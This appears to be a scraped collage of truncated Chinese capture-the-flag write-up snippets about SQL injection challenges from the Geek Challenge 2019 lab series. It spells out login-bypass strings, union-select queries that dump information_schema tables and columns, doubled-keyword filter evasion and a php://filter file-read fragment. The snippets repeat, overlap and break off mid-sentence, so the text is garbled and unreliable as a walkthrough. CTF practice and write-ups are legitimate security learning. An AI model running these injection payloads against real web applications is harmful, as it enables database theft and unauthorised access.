undefinedundefined 启动靶机 作者不建议使用sqlmap我们这里就进行手工注入 用万能口令登录admin ' or 1 =1#,详情见上文(https://www.cnblogs.com/m1saka1/p/18411197) 登录成功获得用户名和密码,发现密码并没有卵用,只能换思路利用账号密码的回显页面进行sql注入爆破数据库 由于网站自动转义,为了方便观看过程所以这...
爆数据表1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#回显结果 爆出两个表 开始爆数据表的字段 按照先后顺序把,先爆第一个 爆geekuser数据表的字段1' union select 1,database(),group_concat(column_name) from information_schema....
usename=1' or '1'='1&password=1' or '1'='1 回显flag
后面的内容就和LoveSql一样了 1.排查回显字段1'oorrder bbyy x#,令x=1逐渐增加进行尝试,当x=4时出现报错, 说明注入点字段长度为32.爆库名1'uunionnion sselectelectdatabase(),2,3#,依次变换函数database()的位置,确定哪个位置会回显出我们所查询的信息。经尝试,第三个注入点字段会回显查询信息 3. 爆表...
[极客大挑战 2019]LoveSQL 1 一个比较简单的SQL注入题目,写一下做个笔记。 看到登录直接盲猜账号密码admin和password,然后在账号处进行注入,结果还给我试对了。看了一下网上大佬们的做法,发现我就是捡了个漏,正确做法其实是利用万能密码登录,登录后进行注入。接下来把正规做法记录一下: 万能密码如下: 这里账号...
[极客大挑战 2019]LoveSQL [极客大挑战 2019]LoveSQL---wp from Kuller_yan 先打开靶场 看看题目 一看就和上一题 easysql 尝试万能钥匙1' or 1=1 # 看起来像md5解密,但是解密失败,继续查询字段,admin' order by 3 # admin' order by 4 # 到4的时候没有正常返回,然后用1' union select 1,2,3 # 回...
[极客大挑战2019]babysql1题解 在做题页面输入账号为admin,密码随便输入一个,提示密码错误。此外username和password竟然用get方法传输,我很意外,不过倒是方便了测试。 接着更换密码为'or''=',结果为: 登录成功,但是并没有什么用,没有flag,只能说明这里可以注入,单引号和or没有过滤。
1' oorr '1'='1成功 使用堆叠注入爆数据库1';show database();报错 抛弃堆叠注入 尝试联合注入 联合注入末尾需要使用#号键进行注释#号后面的命令,避免报错 这里值得提一下schema和schemata和常见命令的理解 SCHEMA在MySQL中是数据库,SCHEMATA表用来提供有关数据库的信息。 union select就是联合注入,联合查询的意...
[极客大挑战 2019]LoveSQL 1 一个比较简单的SQL注入题目,写一下做个笔记。 看到登录直接盲猜账号密码admin和password,然后在账号处进行注入,结果还给我试对了。看了一下网上大佬们的做法,发现我就是捡了个漏,正确做法其实是利用万能密码登录,登录后进行注入。接下来把正规做法记录一下: 万能密码如下: 这里账号填...
'1'='1(tip:当passwd不对时后面的or 1=1恒真导致错误密码也可登陆) [极客大挑战2019]Havefun题目主页是个可爱的小猫 查看源码(weber必做的事哈哈)发现php代码...=convert.base64-encode/resource=flag.php 读出来的base解码得到flag [极客大挑战2019]LoveSQL和第一题界面差不多,最上面的小红字放大看看 ...